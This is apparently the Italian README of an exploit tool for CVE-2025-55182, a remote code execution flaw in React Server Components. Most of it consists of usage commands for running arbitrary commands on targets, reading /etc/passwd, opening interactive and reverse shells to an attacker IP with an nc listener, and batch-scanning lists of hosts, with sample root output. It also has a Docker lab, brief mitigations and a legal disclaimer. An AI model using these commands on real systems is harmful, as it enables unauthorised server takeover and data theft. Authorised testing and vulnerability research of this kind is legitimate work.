Exploit basato su Python per CVE-2025-55182 (RCE React Server Components) con shell interattiva, reverse shell, scansione batch e ambiente vulnerabile basato su Docker per test di sicurezza autorizzati.
⚠️ Dichiarazione legale: Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza, ai test di penetrazione autorizzati e a scopi educativi. Utilizzare questo strumento su sistemi target senza autorizzazione esplicita è illegale e non etico.
CVE-2025-55182 è una vulnerabilità critica di esecuzione remota di codice (RCE) nei React Server Components (RSC) che consente a un utente malintenzionato non autenticato di eseguire codice arbitrario sul server tramite deserializzazione malevola di oggetti JavaScript.
| Proprietà | Valore |
|---|
| ID CVE | CVE-2025-55182 |
| Punteggio CVSS | 9.8 (Critico) |
| Vettore di attacco | Rete |
| Complessità dell'attacco | Bassa |
| Privilegi richiesti | Nessuno |
| Interazione utente | Nessuna |
| Impatto | Alto (Riservatezza, Integrità, Disponibilità) |
| Componente interessato | React Server Components (RSC) |
| Versioni interessate | React 18.x - 19.x (build specifici) |
| Data di divulgazione | 3 dicembre 2025 |
| Alias CVE | React2Shell |
Causa principale: React Server Components deserializza in modo non sicuro oggetti JavaScript forniti dall'utente durante l'elaborazione dei payload RSC, consentendo a un utente malintenzionato di iniettare codice malevolo che viene eseguito sul server.
Vettore di attacco: Payload RSC malevoli nelle richieste HTTP Impatto: Esecuzione remota di codice senza autenticazione, compromissione del server, fuga di dati
# Clona il repository
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju
# Installa le dipendenze
pip install -r requirements.txt
# Installa le dipendenze
pip install requests
# Esegui un comando sul target vulnerabile
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"
# Modalità shell interattiva
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell
# Comando personalizzato
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"
# Reverse shell con IP/porta personalizzati
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
# Scansione batch
python exploit/batch_scanner.py -f targets.txt
# Modalità verbosa
python exploit/cve_2025_55182.py -u http://target.com -v
# User-Agent personalizzato
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"
cd target
docker-compose up -d
cd target
npm install
npm run dev
Accedi all'applicazione vulnerabile: http://localhost:3000
Esegui un singolo comando sul server vulnerabile:
python exploit/cve_2025_55182.py -u http://target.com -c "id"
Output previsto:
[+] Rilevamento vulnerabilità riuscito: React Server Components RCE
[+] Comando eseguito: id
[+] Risposta:
uid=0(root) gid=0(root) groups=0(root)
Ottieni una shell interattiva sul server vulnerabile:
python exploit/cve_2025_55182.py -u http://target.com --shell
Funzionalità:
Stabilisci una connessione reverse shell:
# Sulla macchina dell'attaccante
nc -lvnp 4444
# Esegui lo strumento di sfruttamento
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
Scansiona più target per la vulnerabilità:
# Crea il file dei target
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF
# Esegui lo scanner batch
python exploit/batch_scanner.py -f targets.txt
Aggiorna React
npm install react@latest
# Aggiorna alla versione corretta
Blocca le richieste RSC
// Disabilita temporaneamente RSC
const config = {
enableRSC: false
}
Regole WAF
# Configura l'ambiente vulnerabile
cd target && docker-compose up -d
# Testa la vulnerabilità
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confermata'"
# Esegui la suite di test
python tests/test_exploit.py
Questo strumento dimostra:
Questo progetto è concesso in licenza MIT - consulta il file LICENSE per i dettagli.
Importante: Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati.
Utilizzando questo strumento, accetti di:
Se scopri questa vulnerabilità in sistemi di produzione:
Segnala al fornitore
Assegnazione CVE
Comunità della sicurezza
Ricorda: La ricerca sulla sicurezza dovrebbe essere sempre etica e legale. Usa le tue competenze per rendere Internet più sicuro! 🛡️